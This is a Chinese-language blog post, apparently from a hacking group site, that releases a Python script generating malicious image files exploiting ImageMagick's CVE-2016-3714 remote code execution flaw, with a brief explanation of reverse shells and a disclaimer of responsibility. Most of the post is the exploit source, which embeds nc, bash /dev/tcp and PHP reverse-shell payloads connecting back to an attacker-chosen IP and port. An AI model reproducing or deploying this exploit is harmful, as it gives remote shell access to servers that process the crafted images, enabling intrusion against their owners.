前幾天看到爆出了關於ImageMagick的遠程執行漏洞(CVE-2016-3714),所以為了Evil0x.COM核心成員使用,寫了一個exp產生指令碼供大家使用。(免責聲明,出了事我不管)
總體來說這個指令碼有三個功能
產生針對NC反彈
產生針對bash反彈
產生針對php反射
服務端都可以使用nc偵聽,會反彈shell。產生圖片預設exp.png 尾碼可以自由更改為其他的圖片格式
什麼叫做shell反彈?
reverse shell,又稱shell反彈或shell反射,就是控制端監聽在某TCP/UDP連接埠,被控端發起請求到該連接埠,並將其命令列的輸入輸出轉到控制端。reverse shell與telnet,ssh等標準shell對應,本質上是網路概念的用戶端與服務端的角色反轉。通常用於被控端因防火牆受限、許可權不足、連接埠被佔用等情形。
作者:莫旭友
連結:http://www.zhihu.com/question/24503813/answer/28088923
來源:知乎,稍有改動
以上,放出原始碼。
檔案下載:
imagemagic_exp.zip
# -*-coding:utf-8-*-#!/usr/bin/env python#imagemagic_exp.py import argparse class payload(object): """ building payload,you must input shell typle and server ip and port CVE-2016-3714 - Insufficient shell characters filtering leads to (potentially remote) code execution Insufficient filtering for filename passed to delegate's command allows remote code execution during conversion of several file formats """ def __init__(self, shelltype,ip,port): #super(_paload, self).__init__() self.shelltype = shelltype self.ip = ip self.port =port self.nc='nc -e /bin/sh' + self.ip+ ' ' + self.port self.bash= 'bash -i >& /dev/tcp/' + self.ip + '/' + self.port +' 0>%1' self.php="php -r '$sock=fsockopen(%s,%s);exec(\"/bin/sh -i <&3 >&3 2>&3\");'" %(self.ip,self.port) self.shell_dict={ 'nc': self.nc, 'bash': self.bash, 'php': self.php } def payloadbuild(self): """ push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/127.0.0.1/2333 0>&1")' pop graphic-context """ if self.shelltype =='nc': self.shell =self.shell_dict['nc'] if self.shelltype=='bash': self.shell =self.shell_dict['bash'] if self.shelltype=='php': self.shell =self.shell_dict['php'] self.shellcode="fill 'url(https://example.com/image.jpg\"|"+self.shell+ " \")\' " payload =[] payload.append('push graphic-context') payload.append('viewbox 0 0 640 480') payload.append(self.shellcode) payload.append('pop graphic-context') return payload #touch a jpg image def newimage(self): with open('exp.jpg', 'w') as file: for item in self.payloadbuild(): file.write(item+'\n') if __name__=='__main__': parse =argparse.ArgumentParser() parse.add_argument("--nc",help="產生可執行 nc反射的圖片",action="store_true") parse.add_argument("--bash",help="產生可執行bash反射的圖片",action="store_true") parse.add_argument("--php",help="產生可執行php射的圖片",action="store_true") parse.add_argument("--ip",help="反彈shell 的 ip",default='127.0.0.1') parse.add_argument("--port",help="反彈shell的port",default='8888') args=parse.parse_args() if args.nc: test=payload('nc', args.ip, args.port) test.newimage() if args.bash: test=payload('bash', args.ip, args.port) test.newimage() if args.php: test=payload('php', args.ip, args.port) test.newimage()